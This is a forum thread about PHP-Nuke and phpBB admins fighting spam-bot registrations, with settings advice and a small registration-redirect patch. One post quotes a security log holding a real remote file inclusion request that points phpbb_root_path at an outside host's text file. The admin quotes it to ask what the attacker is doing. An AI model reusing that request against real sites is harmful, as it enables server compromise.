Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Digital-Overload
Hangin' Around



Joined: May 13, 2005
Posts: 26

PostPosted: Thu Sep 21, 2006 9:06 am Reply with quote

Ok, Im Having Tons of Problems with Spam Bots, and i cant fit all the specs in the subject space so,


PHP-Nuke 7.5 Or 7.6, cant be sure which one i uploaded,
phpbb 2.0.10
Nuke Sentinel Secuirity


ok my problem, recently spam bots have been hitting the guestbook, which was disabled, and now they've moved to the Forums,

I've logged in and deleted spam messages for random drugs and sites, deleted the Account, and Banned the IP for spam, but they keep coming about 10 times a day,

Recently I Logged in, went to My PHP-Nuke Admin Section, clicked forums, and clicked on Configuration on the PHPBB Admin Index, and selected "Admin" bullet under "Enable Account Activation"

Problem Is, My Admin Email never recieves any approval notices, and users are still registering,

so, why isnt the registrations requiring Admin Approval?
Does PHP-Nuke Registration Module Not USe the Forums settings?

is there a way i can set nuke to require an admin approval,

it seems registering from the your_account module doesnot require the admin approval that was set in the forums user registration section, and i cant find the option in the PHP-Nuke Configuration panel anywhere,

So is there a setting? or is there a module I can use that will be easy to install and co-exist with the Sentinel Secuirity
 
View user's profile Send private message
srhh
Involved
Involved



Joined: Dec 27, 2005
Posts: 296

PostPosted: Thu Sep 21, 2006 9:12 am Reply with quote

HI,

Well, you can avoid the whole admin approval thing if you make your forums view only and disable anonymous posting.
Anyways, the phpbb thing didn't work because that is a different setting and users do not sign up for accounts through phpbb, they go through the Your_Account module.
Which leads me into the next, thing, CNBYA is an advanced Your_Account module and has the ability for admins to approve registration among lots of other things.
But, I think you should be able to at least make new users verify their e-mail address in the standard YourAccount, which iwll stop those spam accounts.
 
View user's profile Send private message
Digital-Overload







PostPosted: Thu Sep 21, 2006 9:16 am Reply with quote

right now only registered users can post on my forums, but the spam bots register alot...

When Registering thru Your_Account, the site still requires the user to verify email, oddly enough, my admin email for the site also gets "Failed Delivery" emails for the spambots accounts, yet they are still able to post without verifying the account?

The Forums Configuration Section was recently on "none" for approval, and i did move it to admin, so if they ARE useing the forums module to register, then hopefully i can stop it, but i think they are using the Your_Accounts module...
 
srhh







PostPosted: Thu Sep 21, 2006 10:17 am Reply with quote

Hmm, that's weird. To think of it, I've had the same issue here and there with bots signing up and bypassing the email check, and I'm using CNBYA, but they haven't posted in the forums. I was getting ALOT of spammers trying to post that I saw in my Sentinel logs not to mention viscious bots just draining bandwidth, so I just installed Guardian's SpamStopper yesterday which should hopefully do the trick. Itc checks for bad refferers and keywords like viagra to deny the bot access and/or ban it. Still trying to get it set up, but you can get it here: [ Only registered users can see links on this board! Get registered or login! ]

Otherwise, I'll leave this thread to the experts!
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Thu Sep 21, 2006 6:05 pm Reply with quote

My guess is that the old version of phpBB is being exploited, may need to get your system up to BBToNuke 2.0.21

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam

PostPosted: Thu Sep 21, 2006 6:05 pm Reply with quote

Make sure you nuke is using the latest patches.
Double check your forum settings in Admin ->Forums ->Permission ->'advanced mode' to make sure post, reply and quote are set to registered only.
If they are only spamming one or two specific forums I suspect this is the reason - some of the forums are set to allow anonymous posting.

Make sure on you main nuke settings that 'allow email changes' is set to NO and allow username changes is also set to NO.
 
View user's profile Send private message Send e-mail
Digital-Overload







PostPosted: Fri Sep 22, 2006 12:03 am Reply with quote

The Forums are all locked to Registered only for Posting,

they seem to be explioting the phpbb Registration Module (forums.html?file=profile&mode=register), Becaue during the last 5 hours 2 more bots registered, but i noticed they didnt post anything, which is unusual, sure enough i check my admin email and both accounts were awaiting approval (even though i deleted from a remote location before checking my admin mail)


Before the Setting for the Forums Enable User Activation was set to either None/User, I recently CHanged it to Admin a few minutes before posting my first post in this topic.

So, They Seem to Be using the Forums themselves to register before posting, and since they are registering using the forums module and not the Your_Account module, the forums settings are forcing them to wait for my approval which they wont get,

Oh,
they are always Spamming my "General Discussion forum" (or Forumid=1), Which is Set to Guest are only allowed to View, and to Post / Reply you have to be Registered,

So it seems for now they are blocked from posting (seeing the forums module requires admin approval to activate their accounts)

Its Odd,
I've ALso been Getting Hits by Random People trying to access the forums admin section with wierd strings, and yes, the Wonderful Sentinel Program Catches them and bans them appropriatly,

Coming From random IPs, What Exaclty are thes e people trying to do?
(removed my domain name to avoid problems)

Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.805
Query String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php?phpbb_root_path=http://mirckurdu.net/images/lol.txt?
Get String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php?phpbb_root_path=http://mirckurdu.net/images/lol.txt?
Post String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php
Forwarded For: 202.157.207.241
Client IP: none
Remote Address: 202.157.192.162
Remote Port: none
Request Method: GET


Last edited by Digital-Overload on Fri Sep 22, 2006 1:09 am; edited 1 time in total 
Guardian2003







PostPosted: Fri Sep 22, 2006 12:21 am Reply with quote

This script kiddie has been attacking my site for the last couple of weeks so I'm familiar with this one.
You did not mention forum 'quote' permissions - you may want to re-check those Smile

And I forgot to mention turning on the security graphic in config.php Smile

You could also set up a redirect in htaccess so that anyone trying to hit the 'register' forum link gets redirected to the YA register page.
 
Digital-Overload







PostPosted: Fri Sep 22, 2006 1:08 am Reply with quote

Well, for now they can attempt to register, but the Forum is requiring them to wait for my approval, so they cant post,

for permissions, everything is set to REG, except teh edit/delete/mod stuff,

the only thing unregistered viewers can do is read..

So For now the Situation is contained,
 
Guardian2003







PostPosted: Fri Sep 22, 2006 7:59 am Reply with quote

Excellent news!
 
evaders99







PostPosted: Fri Sep 22, 2006 8:08 am Reply with quote

Personally I just disable the forums registration completely

Code:


in includes/usercp_register.php


FIND

if ( !defined('IN_PHPBB') )
{
        die("Hacking attempt");
        exit;
}


AFTER, ADD


if ($mode == "register") {
   Header("Location: account-new_user.html");
   die();
}
 
thebishop
Worker
Worker



Joined: Aug 30, 2005
Posts: 244
Location: Flying to close to the sun

PostPosted: Fri Oct 23, 2009 2:48 pm Reply with quote

evaders99 wrote:
Personally I just disable the forums registration completely

Code:


in includes/usercp_register.php


FIND

if ( !defined('IN_PHPBB') )
{
        die("Hacking attempt");
        exit;
}


AFTER, ADD


if ($mode == "register") {
   Header("Location: account-new_user.html");
   die();
}



I added that code to the 'usercp_register.php' file but clients are still able to register using the registration link in the forums.

I have had 4 people register over the last week and no new registrant emails were sent for the site admin to approve the registration, and when i check the site i have four new registered clients showing up in the user info block and in the members list.

I am using the latest approve membership module for account approval. with 7.6 np to 3.3.
 
View user's profile Send private message
slackervaara
Worker
Worker



Joined: Aug 26, 2007
Posts: 236

PostPosted: Sat Oct 24, 2009 2:05 am Reply with quote

I have not had a single spam on my site since I installed bbantispam or Advanced Textual Confirmation more than 2 years ago. The secret is to put the installation code in config.php.
[ Only registered users can see links on this board! Get registered or login! ]
 
View user's profile Send private message
thebishop







PostPosted: Sat Oct 24, 2009 3:27 am Reply with quote

slackervaara wrote:
I have not had a single spam on my site since I installed bbantispam or Advanced Textual Confirmation more than 2 years ago. The secret is to put the installation code in config.php.
[ Only registered users can see links on this board! Get registered or login! ]


Ok i read all about it and i think this should work.
I would still be interested in how evaders code works though.
Thanks slackervaara.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©